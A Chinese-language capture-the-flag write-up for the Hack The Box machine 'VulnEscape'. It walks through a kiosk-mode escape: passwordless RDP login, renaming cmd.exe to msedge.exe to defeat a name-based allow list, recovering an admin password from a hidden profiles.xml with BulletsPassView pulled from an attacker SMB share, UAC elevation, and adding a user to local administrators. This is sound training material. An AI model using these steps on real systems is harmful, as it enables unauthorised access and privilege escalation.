HTB: VulnEscape
初始扫描
nmap扫描发现仅开放一个TCP端口:RDP(3389):
1
2
3
4
5
6
7
8
9
|
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-06 19:31 UTC
...[snip]...
Nmap scan report for 10.129.234.51
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-07-06 19:31:40 UTC for 14s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
3389/tcp open ms-wbt-server syn-ack ttl 127
|
详细版本扫描显示Windows系统信息:
1
2
3
4
5
6
7
8
9
10
|
oxdf@hacky$ nmap -p 3389 -sCV 10.129.234.51
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: ESCAPE
| NetBIOS_Domain_Name: ESCAPE
| NetBIOS_Computer_Name: ESCAPE
| DNS_Domain_Name: Escape
| DNS_Computer_Name: Escape
| Product_Version: 10.0.19041
|
RDP连接与Kiosk模式
使用xfreerdp连接RDP服务:
1
|
xfreerdp /v:10.129.234.51 /dynamic-resolution +clipboard -sec-nla
|
发现Kiosk模式界面,使用无密码账户KioskUser0登录:
1
2
|
netexec rdp 10.129.234.51 -u KioskUser0 -p ''
RDP 10.129.234.51 3389 ESCAPE [+] Escape\KioskUser0: (Pwn3d!)
|
Kiosk逃逸技术
启动Edge浏览器
通过Windows键打开开始菜单,搜索并启动Edge浏览器:
文件系统访问
在Edge地址栏输入C:
访问文件系统,发现用户flag:
1
|
C:\Users\kioskUser0\Desktop\user.txt
|
获取Shell
从C:\Windows\System32
下载cmd.exe,重命名为msedge.exe绕过基于名称的允许列表:
1
2
|
PS C:\Windows\System32> copy cmd.exe C:\Users\kioskUser0\Downloads\
PS C:\Users\kioskUser0\Downloads> ren cmd.exe msedge.exe
|
成功执行重命名后的二进制文件获得shell。
权限提升
发现管理员凭证
在隐藏目录C:\_admin
发现profiles.xml文件:
1
2
3
4
5
6
7
8
9
|
<?xml version="1.0" encoding="utf-16"?>
<Data>
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
<Secure>False</Secure>
</Profile>
</Data>
|
使用BulletsPassView恢复密码
通过SMB共享下载BulletsPassView工具:
1
2
3
|
PS C:\> net use \\10.10.14.79\share /u:oxdf oxdf
PS C:\> copy \\10.10.14.79\share\BulletsPassView.exe C:\Users\kioskUser0\Downloads\
PS C:\> C:\Users\kioskUser0\Downloads\BulletsPassView.exe
|
工具成功显示被星号遮蔽的密码。
UAC绕过
使用runas命令以admin身份运行PowerShell:
1
|
PS C:\> runas /user:admin powershell
|
通过GUI方式绕过UAC限制:
1
|
start-process powershell.exe -verb runas
|
获得完全权限的管理员shell:
1
2
3
|
PS C:\> whoami /priv
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
|
获取Root Flag
1
2
|
PS C:\Users\Administrator\Desktop> type root.txt
d46ea343************************
|
额外发现
语言设置调整
通过设置应用将系统语言从韩语改为英语。
Kiosk模式配置分析
将KioskUser0加入管理员组后查看Kiosk配置:
1
|
PS C:\> net localgroup administrators /add KioskUser0
|
发现Kiosk模式配置为以Edge全屏模式运行本地主机网站,并设置了基于名称的应用程序允许列表。